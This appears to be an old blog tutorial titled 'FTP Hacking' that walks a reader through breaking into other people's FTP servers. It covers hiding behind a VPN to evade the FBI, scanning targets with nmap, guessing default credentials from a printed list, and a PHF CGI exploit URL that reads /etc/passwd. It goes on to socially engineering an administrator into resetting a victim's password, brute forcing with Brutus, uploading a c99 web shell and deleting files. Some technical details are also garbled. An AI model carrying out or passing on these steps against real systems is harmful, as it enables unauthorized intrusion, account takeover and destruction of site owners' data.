FTP Hacking
- = / Telnet Introduction \ - =
Telnet was a very generous program back in the day, especially for programmers and businessmen, it
gave them the ability to connect to their remote servers from a far location, such as a trip, a
journey, etc. What telnet does is it connects to the persons I.P address (Internet Protocol)
And a port, the port is used for communication, to stat what part they want to connect to,
(examples: SMTP, FTP, SSH, etc, etc), and then when they insert the data it brings back
the information to the user throughout a text-based platform.
- = / Is telnet illegal? \ = -
It honestly depends on what you are using it for, if your using it to transfer protocols
and data throughout a network, then it is legal. If you are using it to
gain access to a network, it is illegal.
- = / What is an FTP \ = -
FTP Stands for File Transfer Protocol, it is used to send and archive commands about files,
but, when an attacker gets access to your FTP, they can view your files, download them,
and even upload them if they wanted to.
- = / Protection \ = -
Protection is the most important part in this tutorial, if you do not want to get raided
by the FBI do not bother reading this part..
Here is a recommended VPN (Virtual Private Server) That goes by the name of
Hotspot Shield
Download it here:
CODE
http://www.hotspotshield.com
After you install it, your shielded and ready to go!
If you have some problems during the FTP attack with the VPN
Disable the shield for a minute or two.
- = / Lets begin \ - =
First, you want to download Nmap, you can download it here, just choose your installation type
and your ready to go:
CODE
http://nmap.org/download.html
After downloading Nmap, open up "Command Prompt"
Windows Vista - Start >> Search cmd >> open >> Type nmap your-target-here.com
Windows XP - Run >> Type cmd and/or command prompt >> type nmap your-target-here.com
Then your scan thread should start, go grab yourself a coffie, and when your back
all the open ports should be located there.
You better hope Port 21 is opened, because that port is qualified for our FTP attack.
If its closed -------- Try another victim
If its opened -------- continue reading on !
Now that we passed that part, we now got to do some vulnerability testing
First, we got to try commonly used passwords. So you open up Command Prompt, type in
ftp your-target-here.com
Now, your connected to the protocol, but not the network. So lets try out some Default Passwords first.
r00t:r00t
root:root
Fred:Fred
r00t:Password
rootassword
Adminassword
Administrator:Password
Adminass123
Admin:qwerty
Admin:Site-name-here
Owner:administrator
Admin:god
Admin:secret
Admin:Sex
Admin:love
Admin:Password123
Admin:ftp360
Admin:ftp21
Admin:2sexy
Admin:qwert
I came across default passwords for UNIX systems, so I recommend you try these as well:
CODE
http://www.securityspace.com/smysecure/catdescr.html?cat=Default+Unix+Accounts
Those are some commonly used ones I have been across before.
Test all those first, if you don't get a sucessful reply, continue reading on.
And also, some FTP servers have an Anonymous Login, meaning
It has no PWD, or you can login with anything
So, try the defaulted passwords, and check if the system has an anonymous login.
The next method I am going to show you is called PHF.
PHF was first discovered when two young teenagers got full access to the fbi.gov site using the PHF method.
But, what does it exactly do? It a file located in the cgi-bin which gives remote access
to all files, including /etc/passwd/
Here is an example for you:
CODE
TargetHere.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
That is PHF.
the other way is social engineering, if you got some information, you should have the host type they
in this case, they have, lets say FanFusion, fanfusion is used for
people who want to build a website for a person they like
for example, wrestlers, celebrities, etc.
I will contact the Administrator, tell them my (victims) email
is not working so I cannot use the link for forgetting the password
and tell the admin what pass I want for our target.
That, is Social Engineering, it works a lot of times.
If we cannot use Social Engineering, and the attempt failed,
We can use a different method called "Brute Forcing"
We will use 'Brutus' in our attempt.
Download Brutus:
CODE
http://www.hoobie.net/brutus/
It allows FTP bruting, telnet bruting, etc.
Start it up, enter the IP in Target:
In type, press it and select FTP
In port, type in 21, since that is the main
Port for FTP.
Then move down to Authenication Options
Now, on your desktop, create users.txt
and passwords.txt, they have to include
Names and Passwords.. In a more simpler
explanation. Users.txt: The users (Usernames)
Passwords.txt (Passwords)
Now press start, and it should start scanning.
Take a nap, wake up, start up your computer,
and pray the password is cracked..
- = / What to do when your in \ - =
You can Upload a shell, c99, mshell2, etc. To do that type in
mput, (without the comma) then it will ask for the local files. You will put where the shell is saved, for example, C:\users\r00t\c99.php then press enter and then it downloads it to the dictionary. Then go to the site, and after the / put in the file name you labeled on the shell. for example, SITE-Here.com/c99.php
then it should redirect you to your shell.
If you want to scan the files, type in dir, (without the comma), then it should display all the files, remember, some can be .FileName and others can be just FileName, now to open the file, type in dir .filename then it should display the context, if you want to view the file, type in dir .filename what-you-want-to-see
Remember, some can be .filename and others can be just filename without the period.
You can also delete files, just simply type in mdelete or delete then enter the remote file and press enter..
ليست هناك تعليقات:
إرسال تعليق